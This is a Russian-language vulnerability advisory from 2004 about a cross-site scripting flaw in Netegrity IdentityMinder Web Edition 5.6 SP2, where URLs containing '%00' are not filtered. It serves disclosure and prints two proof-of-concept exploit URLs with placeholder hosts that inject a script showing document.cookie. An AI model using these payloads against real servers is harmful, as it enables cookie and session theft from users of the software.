Межсайтовый скриптинг в Netegrity IdentityMinder Web Edition

Дата публикации:
04.07.2004
Всего просмотров:
813
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: IdentityMinder Web Edition 5.6 SP2

Описание: Уязвимость в Netegrity IdentityMinder Web Edition позволяет удаленному пользователю выполнить XSS нападение.

Сервер не фильтрует HTML код в URL, который содержит '%00' символ.

Эксплоит:

http://PUT_ADDRESS_HERE/idm/PUT_SITE_NAME_HERE/ims_mainconsole_principalpopuphandler.do?
searchAttrs0=%25GROUP_NAME%25&searchOperators0=EQUALS&searchFilter0=
&searchOrgDN=PUT_DN_HERE&incChildrenOrgFlag=NO&resultsPerPage=10&oid=
&imsui_taskstate=RESOLVE_SCOPE&imsui_tpnametosearch=group
&numOfExpressions=1%00<script>alert(document.cookie)</script>

http://PUT_ADDRESS_HERE:7001/idmmanage/mobjattr.do?diroid=PUT_OID_HERE
&attrname=Group%20Members&mobjtype=2<script>alert(document.cookie)</script>

Решение: http://www.netegrity.com/products/products.cfm?page=IMoverview

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS in Netegrity IdentityMinder

или введите имя

CAPTCHA